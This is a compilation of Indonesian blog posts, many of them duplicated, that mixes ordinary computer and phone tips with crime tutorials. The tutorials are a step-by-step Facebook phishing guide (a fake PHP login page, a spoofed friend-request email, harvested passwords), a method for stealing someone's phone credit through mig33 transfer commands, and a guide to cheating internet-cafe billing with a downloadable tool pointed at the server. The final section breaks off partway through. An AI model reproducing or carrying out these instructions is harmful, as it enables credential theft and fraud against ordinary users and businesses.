Facebook anda di hack mungkin saja terjadi, entah itu karena lupa log out atau ada orang yang sengaja mencuri password. Jika facebook anda positif di-Hack, tenang jangan panik, lakukan 5 tips yang ada dibawah ini.
1. Jalankan pemeriksaan dengan software antivirus dan anti-Spyware di komputer anda.
2. Pastikan password email anda aman, karena kegiatan facebook sangat berhubungan dengan email.(Sebaiknya untuk password email dengan password facebook berbeda).
3. Jika anda tidak bisa login facebook anda masih bisa meng-klik "Forgot Password" yang ada di halaman login Facebook, namun dengan catatan anda harus bisa login email.ok?
4. Kalau misalnya andamasih bisa login, segera ubah password anda. tapi biasanya si Hacker udah merubah password anda terlebih dahulu.
5. Nah kalau misalnya gak bisa login email dan login facebook, kirim permintaan pada facebook untuk mendelete akun facebook anda agar akun anda tidak disalahgunakan.Caranya :
- Laporkan bahwa facebook anda di hack ke www.krollisse.com
- Minta Facebook segera mendelete akun anda dengan mengirim email ke privacy@facebook.com
Semoga bermanfaat ya... ^_^
TIPS TRICK MEMPERCEPAT KONEKSI INTERNET
Saat anda browsing atau membuka suatu website di internet entah dari warung internet ataupun dari rumah, mungkin anda sering mengeluh akan lambatnya akses untuk menampilkan website tersebut. Padahal akses internet di Indonesia sekarang ini masih terhitung mahal. Sebenarnya ada cara-cara mudah untuk meningkatkan kecepatan akses internat anda tanpa harus membayar biaya lebih mahal. Beberapa diantaranya adalah dengan menyetting browser kita, menggunakan openDNS, dan menggunakan Google Web Accelerator.
Untuk menerapkan trik-trik tersebut sangat mudah. Cara pertama yaitu menyetting browser dapat dilakukan oleh pengguna Internet Explorer dan Mozilla Firefox. Bagi pengguna Internet Explorer klik menu [Tools] [Internet Option], klik tab [General]. Pada opsi “Temperory Internet files”, klik [Settings] lalu Geser slider-nya. Hal itu untuk membuat cache (lokasi penyimpanan sementara) untuk web yang anda buka, sebaliknya disediakan sekitar 5% dari Hard disk.
Bagi pengguna Mozilla Firefox anda dapat mengetikkan “about:config” pada address bar,. setelah itu ubah “network.http.pipelining” dan “network.http.proxy pipelining” menjadi “true”, serta isi “network.http.pipelining.maxrequests” antara 30 –100 ( semakin besar semakin cepat ). Yang terakhir klik kanan dimana saja dan pilih New->Integer , tuliskan “nglayout.initialpaint.delay” lalu isi dengan 0.
Untuk trik kedua, pertama anda harus mendaftar di www.openDNS.com . Setelah itu masuk ke Control Panel dari start menu, pilih network connections lalu pilih koneksi anda dan klik tombol properties. Pada bagian Internet protokol anda bisa pilih TCP/IP dan klik properties. Masukkan angka 208.67.222.222 dan 208.67.220.220 pada opsi DNS dan restart komputer anda.
Setelah melakukan 2 tips di atas sekarang anda pasti akan mendapat kecepatan akses yang lebih kencang. Bagi yang masih belum puas dengan kecepatan aksesnya sekarang dapat menggunakan trik yang ke tiga yaitu Google Web Accelerator. Google Web Accelerator di desain khusus untuk mempercepat akses internet anda, khususnya anda yang menggunakan koneksi broadband (pita lebar) seperti Cable dan DSL. Untuk anda yang menggunakan koneksi lain seperti Dial-up (Telkomnet Instant atau Speedy) maupun satelit atau wave, Google Web Accelerator juga dapat mempercepat aksesnya.
Untuk memakai Google Web Accelerator anda harus memenuhi kriteria antara lain Operating System anda harus Windows XP atau Windows 2000 dan browser anda harus Internet Explorer 5.5+ atau Mozilla Firefox 1.0+. Kalau untuk browser lainnya sebenarnya juga bisa, tetapi anda harus meng-konfigurasi proxy settings dari browser anda dengan menambah 127.0.0.1:9100 pada HTTP. Setelah anda melakukan instalasi, Google Web Accelerator akan menampilkan icon kecil di atas browser anda dan icon tray di pojok bawah layar komputer. Anda dapat mengunduh Google Web Accelerator di http://webaccelerator.google.co
Untuk menerapkan trik-trik tersebut sangat mudah. Cara pertama yaitu menyetting browser dapat dilakukan oleh pengguna Internet Explorer dan Mozilla Firefox. Bagi pengguna Internet Explorer klik menu [Tools] [Internet Option], klik tab [General]. Pada opsi “Temperory Internet files”, klik [Settings] lalu Geser slider-nya. Hal itu untuk membuat cache (lokasi penyimpanan sementara) untuk web yang anda buka, sebaliknya disediakan sekitar 5% dari Hard disk.
Bagi pengguna Mozilla Firefox anda dapat mengetikkan “about:config” pada address bar,. setelah itu ubah “network.http.pipelining” dan “network.http.proxy pipelining” menjadi “true”, serta isi “network.http.pipelining.maxrequests” antara 30 –100 ( semakin besar semakin cepat ). Yang terakhir klik kanan dimana saja dan pilih New->Integer , tuliskan “nglayout.initialpaint.delay” lalu isi dengan 0.
Untuk trik kedua, pertama anda harus mendaftar di www.openDNS.com . Setelah itu masuk ke Control Panel dari start menu, pilih network connections lalu pilih koneksi anda dan klik tombol properties. Pada bagian Internet protokol anda bisa pilih TCP/IP dan klik properties. Masukkan angka 208.67.222.222 dan 208.67.220.220 pada opsi DNS dan restart komputer anda.
Setelah melakukan 2 tips di atas sekarang anda pasti akan mendapat kecepatan akses yang lebih kencang. Bagi yang masih belum puas dengan kecepatan aksesnya sekarang dapat menggunakan trik yang ke tiga yaitu Google Web Accelerator. Google Web Accelerator di desain khusus untuk mempercepat akses internet anda, khususnya anda yang menggunakan koneksi broadband (pita lebar) seperti Cable dan DSL. Untuk anda yang menggunakan koneksi lain seperti Dial-up (Telkomnet Instant atau Speedy) maupun satelit atau wave, Google Web Accelerator juga dapat mempercepat aksesnya.
Untuk memakai Google Web Accelerator anda harus memenuhi kriteria antara lain Operating System anda harus Windows XP atau Windows 2000 dan browser anda harus Internet Explorer 5.5+ atau Mozilla Firefox 1.0+. Kalau untuk browser lainnya sebenarnya juga bisa, tetapi anda harus meng-konfigurasi proxy settings dari browser anda dengan menambah 127.0.0.1:9100 pada HTTP. Setelah anda melakukan instalasi, Google Web Accelerator akan menampilkan icon kecil di atas browser anda dan icon tray di pojok bawah layar komputer. Anda dapat mengunduh Google Web Accelerator di http://webaccelerator.google.co
MENCURI ACCOUNT FACEBOOK DENGAN HALAMAN LOGIN PALSU
Saat ini, Facebook menjadi situs jejaring social (Social Networking Site) paling popular di dunia maya di banding situs jejaring social lainnya.. Berdasarkan data terakhir Check Facebook, pengguna facebook di seluruh dunia mencapai 230.379.660 pengguna dengan pengguna terbesar berasal dari Amerika Serikat yakni 70.340.120 pengguna. Indonesia menduduki posisi ke 7 dengan 6.919.120 pengguna. Sementara negera dengan pertumbuhan pengguna facebook terbesar adalah Taiwan yang mencapai 15.79 % dengan total pengguna 102.140 orang.
Banyaknya jumlah pengguna menyebabkan facebook menjadi salah satu sasaran chyber crime baik melalui penipuan dalam berinteraksi didalam facebook maupun percobaan dalam mencuri account. Sebab, dengan memasang perangkap, maka username dan password yang terjaring lebih banyak dan lebih variatif.
Menyiapkan serangan.
Tutorial kali ini akan menggunakan teknik phising yakni teknik menjebak pengguna facebook masuk dalam sebuah perangkap berupa facebook tiruan yang mirip dengan tampilan facebook asli. Jika ceroboh, user yang sudah terjebak akan memasukkan username dan passwordnya pada kotak login. Account yang baru di masukkan tersebut, selanjutnya akan di kirim ke sebuah file secara online dan account hasil tangkapan bisa kita cek kapan saja dan dari mana saja.
Berikut ini adalah langkah-langkah memulai serangan :
1. Buatlah file script halaman login palsu. Di internet, script ini sudah beredar luas di internet. Script tersebut terbagi dalam 2 file yakni file berisi perintah dalam bahasa PHP bernama index.php serta file eksekutor bernama write.php yang bisa di download di sini(http://www.blogcatalog.com/search.frame.php?term=mencuri+password+dan+username+facebook&id=224f1ade70cc402c77b21df5cbc9ae4d).
2. Kedua file tersebut kita upload ke situs web hosting yang mendukung bahasa php. Web tersebut bisa di cari di google. Dalam tutorial ini kita menggunakan www.ripway.com. Untuk mendaftar, klik di sini.
3. Di web hosting Ripway, masuk ke tab My Files, sehingga kedua file yang kita upload terlihat. Nah, alamat yang terdapat pada Direct Link di file Index.php adalah link yang kita perlukan untuk mencuri account facebook.
Memulai Serangan.
Alamat link dari file index.php, kita sebarkan dengan cara yang sedikit culas. Misalnya, seakan-akan korban merasa mendapatkan email dari facebook untuk konfirmasi atau undangan pertemanan. Untuk lebih memperhalus, bisa menggunakan email palsu dengan nama admin.facebook atau yang lainnya sehingga korban tidak curiga sama sekali. Untuk isi email, tirulah kata-kata email confrmation dari facebook dengan mengcopy-pastenya. Contoh :
Budi mengajak Anda anda berteman di Facebook. Kami perlu memastikan kepada Anda bahwa Anda memang mengenal Budi agar Anda bisa berteman di Facebook.
Untuk mengonfirmasi permintaan pertemanan ini, ikuti tautan di bawah ini:
http://www.facebook.com/n/?reqs.php&mid=b676a5j6624e17G74e2aG2
Terima kasih,
Tim Facebook
Bisa juga dengan cara mengakses langsung computer korban dengan mengarahkan loading internet komputernya ke direct link facebook palsu tersebut. Jadi, mengenai cara penyebarannya bisa dengan pengembangan sendiri.
Semua data account yang berhasil di jaring akan tersimpan secara otomatis dalam sebuah file bernama password.txt yang muncul otomatis di Ripway. Refresh atau tekan F5 untuk melihat hasil tangkapan terbaru.
Antisipasi Fake Facebook
Mnghindari teknik phising facebook ini, cara paling ampuh adalah meningkatkan kewaspadaan. Langkah detailnya sebagai berikut :
1. Hanya menerima konfirmasi pertemanan dari orang yang sudah kita kenal
2. Pastikan, alamat facebook hanya http://www.facebook.com
3. Bookmark alamat facebook asli agar tidak terkecoh
4. Perhatikan link konfirmasi pertemanan. Jika pada link tidak tercantum alamat facebook asli,abaikan saja. Konformasi asli pasti menyertakan alamat facebook seperti http://www.facebook.com/n/?reqs.php&mid=b676a5G6a24e1G74e2aG2
5. Selalu mengikuti perkembangan teknik kejahatan internet.
Banyaknya jumlah pengguna menyebabkan facebook menjadi salah satu sasaran chyber crime baik melalui penipuan dalam berinteraksi didalam facebook maupun percobaan dalam mencuri account. Sebab, dengan memasang perangkap, maka username dan password yang terjaring lebih banyak dan lebih variatif.
Menyiapkan serangan.
Tutorial kali ini akan menggunakan teknik phising yakni teknik menjebak pengguna facebook masuk dalam sebuah perangkap berupa facebook tiruan yang mirip dengan tampilan facebook asli. Jika ceroboh, user yang sudah terjebak akan memasukkan username dan passwordnya pada kotak login. Account yang baru di masukkan tersebut, selanjutnya akan di kirim ke sebuah file secara online dan account hasil tangkapan bisa kita cek kapan saja dan dari mana saja.
Berikut ini adalah langkah-langkah memulai serangan :
1. Buatlah file script halaman login palsu. Di internet, script ini sudah beredar luas di internet. Script tersebut terbagi dalam 2 file yakni file berisi perintah dalam bahasa PHP bernama index.php serta file eksekutor bernama write.php yang bisa di download di sini(http://www.blogcatalog.com/search.frame.php?term=mencuri+password+dan+username+facebook&id=224f1ade70cc402c77b21df5cbc9ae4d).
2. Kedua file tersebut kita upload ke situs web hosting yang mendukung bahasa php. Web tersebut bisa di cari di google. Dalam tutorial ini kita menggunakan www.ripway.com. Untuk mendaftar, klik di sini.
3. Di web hosting Ripway, masuk ke tab My Files, sehingga kedua file yang kita upload terlihat. Nah, alamat yang terdapat pada Direct Link di file Index.php adalah link yang kita perlukan untuk mencuri account facebook.
Memulai Serangan.
Alamat link dari file index.php, kita sebarkan dengan cara yang sedikit culas. Misalnya, seakan-akan korban merasa mendapatkan email dari facebook untuk konfirmasi atau undangan pertemanan. Untuk lebih memperhalus, bisa menggunakan email palsu dengan nama admin.facebook atau yang lainnya sehingga korban tidak curiga sama sekali. Untuk isi email, tirulah kata-kata email confrmation dari facebook dengan mengcopy-pastenya. Contoh :
Budi mengajak Anda anda berteman di Facebook. Kami perlu memastikan kepada Anda bahwa Anda memang mengenal Budi agar Anda bisa berteman di Facebook.
Untuk mengonfirmasi permintaan pertemanan ini, ikuti tautan di bawah ini:
http://www.facebook.com/n/?reqs.php&mid=b676a5j6624e17G74e2aG2
Terima kasih,
Tim Facebook
Bisa juga dengan cara mengakses langsung computer korban dengan mengarahkan loading internet komputernya ke direct link facebook palsu tersebut. Jadi, mengenai cara penyebarannya bisa dengan pengembangan sendiri.
Semua data account yang berhasil di jaring akan tersimpan secara otomatis dalam sebuah file bernama password.txt yang muncul otomatis di Ripway. Refresh atau tekan F5 untuk melihat hasil tangkapan terbaru.
Antisipasi Fake Facebook
Mnghindari teknik phising facebook ini, cara paling ampuh adalah meningkatkan kewaspadaan. Langkah detailnya sebagai berikut :
1. Hanya menerima konfirmasi pertemanan dari orang yang sudah kita kenal
2. Pastikan, alamat facebook hanya http://www.facebook.com
3. Bookmark alamat facebook asli agar tidak terkecoh
4. Perhatikan link konfirmasi pertemanan. Jika pada link tidak tercantum alamat facebook asli,abaikan saja. Konformasi asli pasti menyertakan alamat facebook seperti http://www.facebook.com/n/?reqs.php&mid=b676a5G6a24e1G74e2aG2
5. Selalu mengikuti perkembangan teknik kejahatan internet.
NgeHack > Mencuri Pulsa Teman Anda ( Orang Lain ) Tanpa Sepengetahuannya
Yuhuuuu ..... , Setelah Selesai Memposting 2 Postingan Yang Berisi Tentang " Bugs > Cara Ngisi Pulsa GSM & CDMA Berlipat Ganda " Dan " Trick > Mengirim Pesan Tanpa Nomer Pribadi Hp Anda " ,,,
Pada Kali ini Saya Mempunyi Cara Nge Hack / Membajak / Mencuri Pulsa Teman Kita Tanpa Sepengetahuannya .....
Ihhhh .... Serammmm .... ^_^ hihihihihi.....
Yang Harus Di Ingat , Postingan ini Bukan Berarti Untuk Mengajarkan Kalian Yang Tidak Benar , Akan Tetapi Postingan ini Hanya Diperuntukan Untuk Pengetahuan Dan Tentunya Untuk Pembelajaran Semata ....
Ingin Tau ????Pnasarannn?????
Oke ....
Kalian Ikuti Cara Di Bawah ini :
1. kamu masuk aplikasi mig33 ( http://wap.mig33.com/join.php ) Tanpa Tanda Kurung , ( Gunakan Browse Mobile Anda ) Jangan Lewat PC Atau Warnet ( Notebook ) Anda,. Tanpa Tanda Kurung ,
2. Setelah Itu , Langsung Aja regristrasi ( Daftar ), kamu isi username, password, dan no hp (no. Korban yg akan kamu sedot pulsanya),
3. lalu submit, setelah itu kamu login dan pilih remind me later,
4. lalu kamu plih invite friend no tujuan kamu isi "TP(spasi)no.kamu(spasi)jumlah pulsa"( Tanpa Tanda Kutip ) , Yang Ingin Kamu Curi Dari Si Korban ,
( Yang Mesti Di Ingat , Misalkan Kamu Ingin Mencuri Pulsa Si Korban Sebanyak 50.000 , Akan Tetapi Pulsa Si Korban Hanya 20.000 , Maka Akan Terjadi Erorr ,Itu Di Karenakan Pulsa Si Korban Tidak Mencukupi Untuk Kamu Curi )
Contoh 1 :
Sebut Aja Kamu Dengan Nama Si " A " ( Si Pelaku Pencurian )
Dan Sebut Aja Si Korban Yang Ingin Kamu Curi Pulsa'a , Si " B "
SI "A" ---- > TP 08565555555 50000
Keterangan : Brati Si A Mencuri Pulsa Dari No Hp 08565555555 Sebanyak Rp.50.000
Si "B" ----- > Sementara Si " B " Pulsa'a Hanya Rp. 20.000
Apabila Kaya Seperti Di Atas , Kemungkinan Akan Terjadi Erorr ,Karena Pulsa Si " B " Hanya Rp.20.000 Sedangkan Si " A " Mencuri Rp.50.000 Dari Si "B" Yang Terjadi Adalah Pulsa Si B Tidak Mencukupi Target Yang Di Minta Oleh Si "A" , Maka Terjadilah Erorr .... Tapiiii ... Apabila DewiFortuna Di Pihak Anda Maka Cara Seperti ini pun Berhasil .... Maka Pulsa SI "B" Yang Rp.20.000 Tidak Tersisa Sepeserpun Untuk Si "B".
Nah ... Untuk Melakukan Yang Benar Dan Tidak Terjadi Erorr,,,, Gw Punya Tips ...
Ikuti Tips Di Bawah Ini :
1. Lo Mesti Tau Betul Orang Yang Ingin Lo Curi Pulsa'a ( Untuk Percobaan ) Lo Curi Pulsa Ade Lo Atau Kaka Lo Sndri
2. Lo Mesti Pulsa Dari Ade Atau Kaka Lo Yang Ingin Di Curi
3. Ini Di Karena Agar Lo Tau Betul Dan Yang Diperlukan Dalam Teknik Ini adalah Mengira-Ngira Isi Pulsa Si "B". Jangan Sampai Melebihi Dari Target Yang Lo Minta Ke Si "B"
Misalkan : Misal Si B Mempunyai Pulsa Rp. 30.000 , Maka Yang Harus Lo Lakuin Adalah , Jangan Melebihi Pada Saat Mencuri Pulsa Si B , Cara Seperti ini Kemungkinan 99,9% Sukses , Di Bandingkan Cara Sebelumnya ,
Contoh Yang Benar :
TP 085555555 29500 ( Maka Yang Akan Terjadi Adalah Pulsa Si "B" Hanya Kamu Sisain Rp.500 Perakkkk ..... )
Keterangan :
TP ----- > Perintah Tranfer Pulsa Untuk Operator M3 , Untuk kartu lain sesuaikan kode transfernya.
085555555 ----- > Nomer Hp Si Korban Yang Ingin Kamu Curi
29500 -------- > Jumlah Pulsa Yang Ingin Kamu Curi
Selamat NgeHack Pulsa Teman Anda .... ^_^
Jangan Di Gunakan Untuk Hal-Hal Yang Tidak Benar Ya .....
Wasalamu 'alaikum..
Pada Kali ini Saya Mempunyi Cara Nge Hack / Membajak / Mencuri Pulsa Teman Kita Tanpa Sepengetahuannya .....
Ihhhh .... Serammmm .... ^_^ hihihihihi.....
Yang Harus Di Ingat , Postingan ini Bukan Berarti Untuk Mengajarkan Kalian Yang Tidak Benar , Akan Tetapi Postingan ini Hanya Diperuntukan Untuk Pengetahuan Dan Tentunya Untuk Pembelajaran Semata ....
Ingin Tau ????Pnasarannn?????
Oke ....
Kalian Ikuti Cara Di Bawah ini :
1. kamu masuk aplikasi mig33 ( http://wap.mig33.com/join.php ) Tanpa Tanda Kurung , ( Gunakan Browse Mobile Anda ) Jangan Lewat PC Atau Warnet ( Notebook ) Anda,. Tanpa Tanda Kurung ,
2. Setelah Itu , Langsung Aja regristrasi ( Daftar ), kamu isi username, password, dan no hp (no. Korban yg akan kamu sedot pulsanya),
3. lalu submit, setelah itu kamu login dan pilih remind me later,
4. lalu kamu plih invite friend no tujuan kamu isi "TP(spasi)no.kamu(spasi)jumlah pulsa"( Tanpa Tanda Kutip ) , Yang Ingin Kamu Curi Dari Si Korban ,
( Yang Mesti Di Ingat , Misalkan Kamu Ingin Mencuri Pulsa Si Korban Sebanyak 50.000 , Akan Tetapi Pulsa Si Korban Hanya 20.000 , Maka Akan Terjadi Erorr ,Itu Di Karenakan Pulsa Si Korban Tidak Mencukupi Untuk Kamu Curi )
Contoh 1 :
Sebut Aja Kamu Dengan Nama Si " A " ( Si Pelaku Pencurian )
Dan Sebut Aja Si Korban Yang Ingin Kamu Curi Pulsa'a , Si " B "
SI "A" ---- > TP 08565555555 50000
Keterangan : Brati Si A Mencuri Pulsa Dari No Hp 08565555555 Sebanyak Rp.50.000
Si "B" ----- > Sementara Si " B " Pulsa'a Hanya Rp. 20.000
Apabila Kaya Seperti Di Atas , Kemungkinan Akan Terjadi Erorr ,Karena Pulsa Si " B " Hanya Rp.20.000 Sedangkan Si " A " Mencuri Rp.50.000 Dari Si "B" Yang Terjadi Adalah Pulsa Si B Tidak Mencukupi Target Yang Di Minta Oleh Si "A" , Maka Terjadilah Erorr .... Tapiiii ... Apabila DewiFortuna Di Pihak Anda Maka Cara Seperti ini pun Berhasil .... Maka Pulsa SI "B" Yang Rp.20.000 Tidak Tersisa Sepeserpun Untuk Si "B".
Nah ... Untuk Melakukan Yang Benar Dan Tidak Terjadi Erorr,,,, Gw Punya Tips ...
Ikuti Tips Di Bawah Ini :
1. Lo Mesti Tau Betul Orang Yang Ingin Lo Curi Pulsa'a ( Untuk Percobaan ) Lo Curi Pulsa Ade Lo Atau Kaka Lo Sndri
2. Lo Mesti Pulsa Dari Ade Atau Kaka Lo Yang Ingin Di Curi
3. Ini Di Karena Agar Lo Tau Betul Dan Yang Diperlukan Dalam Teknik Ini adalah Mengira-Ngira Isi Pulsa Si "B". Jangan Sampai Melebihi Dari Target Yang Lo Minta Ke Si "B"
Misalkan : Misal Si B Mempunyai Pulsa Rp. 30.000 , Maka Yang Harus Lo Lakuin Adalah , Jangan Melebihi Pada Saat Mencuri Pulsa Si B , Cara Seperti ini Kemungkinan 99,9% Sukses , Di Bandingkan Cara Sebelumnya ,
Contoh Yang Benar :
TP 085555555 29500 ( Maka Yang Akan Terjadi Adalah Pulsa Si "B" Hanya Kamu Sisain Rp.500 Perakkkk ..... )
Keterangan :
TP ----- > Perintah Tranfer Pulsa Untuk Operator M3 , Untuk kartu lain sesuaikan kode transfernya.
085555555 ----- > Nomer Hp Si Korban Yang Ingin Kamu Curi
29500 -------- > Jumlah Pulsa Yang Ingin Kamu Curi
Selamat NgeHack Pulsa Teman Anda .... ^_^
Jangan Di Gunakan Untuk Hal-Hal Yang Tidak Benar Ya .....
Wasalamu 'alaikum..
Tips Menggabungkan Nomor GSM & CDMA dalam satu HP
Menggabungkan Nomor GSM dan CDMA dalam Satu HP
Anda mungkin pernah mempunyai keinginan untuk menggabungkan nomor GSM dan CDMA dalam handphone Anda. Akan tetapi, anda hanya mempunyai satu handphone GSM saja.
Atau, anda mungkin mempunyai 2 buah nomor handphone, satu CDMA dan satu lagi GSM. Tetapi anda merasa kerepotan membawa 2 handphone, sementara teman teman anda sudah mengetahui kedua nomor itu. Anda berkeinginan menggabungkan saja dalam satu handphone saja tapi tetap bisa menerima kedua nomor tersebut.
Barangkali yang ada di benak anda adalah, anda harus membeli handphone yang support CDMA dan GSM sekaligus, artinya anda harus memasukkan kedua kartu tersebut ke dalam satu handphone. Atau anda berfikir untuk membawanya ke tempat service handphone yang bisa menggabungkan kedua kartu dengan biaya yang cukup mahal.
Kedua cara di atas memang bisa menyelesaikan masalah anda, tapi anda terpaksa harus mengeluarkan biaya dalam jumlah besar. Bayangkan saja, HP yang support GSM dan CDMA dipasaran seharga RP. 3.500.000. Artinya anda harus mengeluarkan kocek lebih dengan mengorbankan HP yang anda gunakan selama ini. Sedangkan untuk mencari orang yang dapat menggabungkan 2 nomor sekaligus, amat susah dan tentu, biayanya mahal.
Percayakah anda? Anda TIDAK PERLU bersusah payah untuk melakukan kedua hal di atas. Ada cara yang sangat mudah agar anda tetap dapat menggunakan kedua nomor tersebut dalam HP GSM anda.
Nah, bagaimana caranya? Ternyata semuanya bisa diakali cukup dengan PENGALIHAN NOMOR PANGGILAN atau istilah lainnya CALL DIVERT.
Kita mengalihkan semua panggilan yang masuk ke nomor CDMA ke nomor GSM yang kita gunakan. Jadi, ketika ada teman kita yang menelepon ke nomor CDMA kita, otomatis akan kita terima di Hanphone GSM kita. Tentunya HP CDMA harus kita matikan, dan nomornya cukup kita simpan saja, sehingga yang berfungsi adalah HP GSM kita.
Perlu diperhatikan bahwa cara ini hanya dapat digunakan untuk MENERIMA PANGGILAN SAJA, tidak bisa menerima sms karena belum ada operator yang memberikan layanan sms divert (mudah-mudahan suatu saat nanti ada layanan tsb). Untuk menelpon, menerima dan mengirim sms, anda tetap menggunakan nomor GSM anda.
Caranya::
Dari HP CDMA dg nomor Flexi:
1. tekan *71+nomor GSM
Contoh: *71081977676666
2. tekan Yes/OK
3. Matikan HP
dari HP CDMA nomor Starone:
1. tekan *92+nomor GSM
Contoh: *92081977676666
2. tekan Yes/OK
3. Matikan HP
dari HP CDMA nomor Esia:
1. tekan *12+nomor GSM
Contoh: *12081977676666
2. tekan Yes/OK
3. Matikan HP
Coba anda minta tolong teman anda menelepon ke nomor CDMA anda, maka HP GSM Anda akan berbunyi.
Saat ini saya menggunakan 2 nomor dalam handphone GSM saya, satu flexi dan satu lagi XL. Ketika da teman yang menelepon dari flexi, otomatis akan masuk ke HP GSM saya, padahal saya hanya menggunakan NOKIA 6020.
Selamat mencoba…!!
Anda mungkin pernah mempunyai keinginan untuk menggabungkan nomor GSM dan CDMA dalam handphone Anda. Akan tetapi, anda hanya mempunyai satu handphone GSM saja.
Atau, anda mungkin mempunyai 2 buah nomor handphone, satu CDMA dan satu lagi GSM. Tetapi anda merasa kerepotan membawa 2 handphone, sementara teman teman anda sudah mengetahui kedua nomor itu. Anda berkeinginan menggabungkan saja dalam satu handphone saja tapi tetap bisa menerima kedua nomor tersebut.
Barangkali yang ada di benak anda adalah, anda harus membeli handphone yang support CDMA dan GSM sekaligus, artinya anda harus memasukkan kedua kartu tersebut ke dalam satu handphone. Atau anda berfikir untuk membawanya ke tempat service handphone yang bisa menggabungkan kedua kartu dengan biaya yang cukup mahal.
Kedua cara di atas memang bisa menyelesaikan masalah anda, tapi anda terpaksa harus mengeluarkan biaya dalam jumlah besar. Bayangkan saja, HP yang support GSM dan CDMA dipasaran seharga RP. 3.500.000. Artinya anda harus mengeluarkan kocek lebih dengan mengorbankan HP yang anda gunakan selama ini. Sedangkan untuk mencari orang yang dapat menggabungkan 2 nomor sekaligus, amat susah dan tentu, biayanya mahal.
Percayakah anda? Anda TIDAK PERLU bersusah payah untuk melakukan kedua hal di atas. Ada cara yang sangat mudah agar anda tetap dapat menggunakan kedua nomor tersebut dalam HP GSM anda.
Nah, bagaimana caranya? Ternyata semuanya bisa diakali cukup dengan PENGALIHAN NOMOR PANGGILAN atau istilah lainnya CALL DIVERT.
Kita mengalihkan semua panggilan yang masuk ke nomor CDMA ke nomor GSM yang kita gunakan. Jadi, ketika ada teman kita yang menelepon ke nomor CDMA kita, otomatis akan kita terima di Hanphone GSM kita. Tentunya HP CDMA harus kita matikan, dan nomornya cukup kita simpan saja, sehingga yang berfungsi adalah HP GSM kita.
Perlu diperhatikan bahwa cara ini hanya dapat digunakan untuk MENERIMA PANGGILAN SAJA, tidak bisa menerima sms karena belum ada operator yang memberikan layanan sms divert (mudah-mudahan suatu saat nanti ada layanan tsb). Untuk menelpon, menerima dan mengirim sms, anda tetap menggunakan nomor GSM anda.
Caranya::
Dari HP CDMA dg nomor Flexi:
1. tekan *71+nomor GSM
Contoh: *71081977676666
2. tekan Yes/OK
3. Matikan HP
dari HP CDMA nomor Starone:
1. tekan *92+nomor GSM
Contoh: *92081977676666
2. tekan Yes/OK
3. Matikan HP
dari HP CDMA nomor Esia:
1. tekan *12+nomor GSM
Contoh: *12081977676666
2. tekan Yes/OK
3. Matikan HP
Coba anda minta tolong teman anda menelepon ke nomor CDMA anda, maka HP GSM Anda akan berbunyi.
Saat ini saya menggunakan 2 nomor dalam handphone GSM saya, satu flexi dan satu lagi XL. Ketika da teman yang menelepon dari flexi, otomatis akan masuk ke HP GSM saya, padahal saya hanya menggunakan NOKIA 6020.
Selamat mencoba…!!
Daftar Perintah "run" di windows XP
Netter pasti tahu apa itu Run. Run adalah menu atau command yang bisa diakses di Start atau menekan tombol Windows + R.

Nah berikut daftar perintahnya:
* compmgmt.msc - Computer management
* devmgmt.msc - Device manager
* diskmgmt.msc - Disk management
* dfrg.msc - Disk defrag
* eventvwr.msc - Event viewer
* fsmgmt.msc - Shared folders
* gpedit.msc - Group policies
* lusrmgr.msc - Local users and groups
* perfmon.msc - Performance monitor
* rsop.msc - Resultant set of policies
* secpol.msc - Local security settings
* services.msc - Various Services
* msconfig - System Configuration Utility
* regedit - Registry Editor
* msinfo32 - System Information
* sysedit - System Edit
* win.ini - windows loading information(also system.ini)
* winver - Shows current version of windows
* mailto: - Opens default email client
* cmd - Opens command prompt
* msconfig - to configurate start up
* mspaint - to open ms paint program
* calc - to call calculator

Nah berikut daftar perintahnya:
* compmgmt.msc - Computer management
* devmgmt.msc - Device manager
* diskmgmt.msc - Disk management
* dfrg.msc - Disk defrag
* eventvwr.msc - Event viewer
* fsmgmt.msc - Shared folders
* gpedit.msc - Group policies
* lusrmgr.msc - Local users and groups
* perfmon.msc - Performance monitor
* rsop.msc - Resultant set of policies
* secpol.msc - Local security settings
* services.msc - Various Services
* msconfig - System Configuration Utility
* regedit - Registry Editor
* msinfo32 - System Information
* sysedit - System Edit
* win.ini - windows loading information(also system.ini)
* winver - Shows current version of windows
* mailto: - Opens default email client
* cmd - Opens command prompt
* msconfig - to configurate start up
* mspaint - to open ms paint program
* calc - to call calculator
Versi Terbaru > NgeHack Billing Warnet
Sudah banyak cara untuk mengelabui billing explorer atau ngenet gratis dengan kecepatan yang cukup sepat. Kali ini caranya cukup mudah tinggal download aja softwarenya di sini.(belum beredar di internet) Software ini asli bikinan anak jember lho…(hehehehe). Software ini sizenya dijamin gak bakalan ngabisin disk space cuma 70 KB.
Berikut cara penggunaannya :
1. Secangkir Kopi Hangat buat nemenin ngenet gratis semaleman penuh di warnet
2. CMD, kalo CMD di warnet di block coba pake PortableApps >> CMD Portable
3. HackBill.zip
4. Muka HaHo(baca:bego’)
Caranya :
1. Buka CMD, kemudian ketik net view, kemudian pasti keluar komputer-komputer yang terhubung dengan jaringan LAN di warnet tersebut
2. Cari yang kira – kira komputer tersebut adalah komputer server(biasanya pake nama WARNETBILLING, pokonya ada tulisan admin , administrator , billing, dll lah)
3. Kemudian ketik ping nama_kompuet_server(ex. ping DENETBILLING)
4. Catat IP Address adminnya tu…
5. Jalankan program billhack.zip
6. Pilih single client atau all client, single client untuk menggratiskan kompueter tertentu saja, all client untuk menggartiskan semua komputer, saya saranin pake yang single client aja, biar dosanya gak gede-gede amat…
7. Ketik IP Address admin tadi, pake port 1500, trus tekan hack now
8. Taraaaaaaaaaaaa, di biling server nickname kita sudah tidak ada.
9. Tanyain ke OP kalo mau bayar ato mau buktiin kalo emang hacking-nya sukses, kalo gak mau bayar yaudah lewati aja
Catatan : Pada billing di komputer kita billing tetap berjalan, tetapi di server sudah tidak ada,(tidak ada bukan NOL(0)). Hal ini juga bisa membantu kita jika kita ingin jujur, kta tinggal bayar sesui yang tertera pada billing kita.
Jika anda yang membaca ini adalah OP warnet, segera lakukan pencegahan!
Berikut cara penggunaannya :
1. Secangkir Kopi Hangat buat nemenin ngenet gratis semaleman penuh di warnet
2. CMD, kalo CMD di warnet di block coba pake PortableApps >> CMD Portable
3. HackBill.zip
4. Muka HaHo(baca:bego’)
Caranya :
1. Buka CMD, kemudian ketik net view, kemudian pasti keluar komputer-komputer yang terhubung dengan jaringan LAN di warnet tersebut
2. Cari yang kira – kira komputer tersebut adalah komputer server(biasanya pake nama WARNETBILLING, pokonya ada tulisan admin , administrator , billing, dll lah)
3. Kemudian ketik ping nama_kompuet_server(ex. ping DENETBILLING)
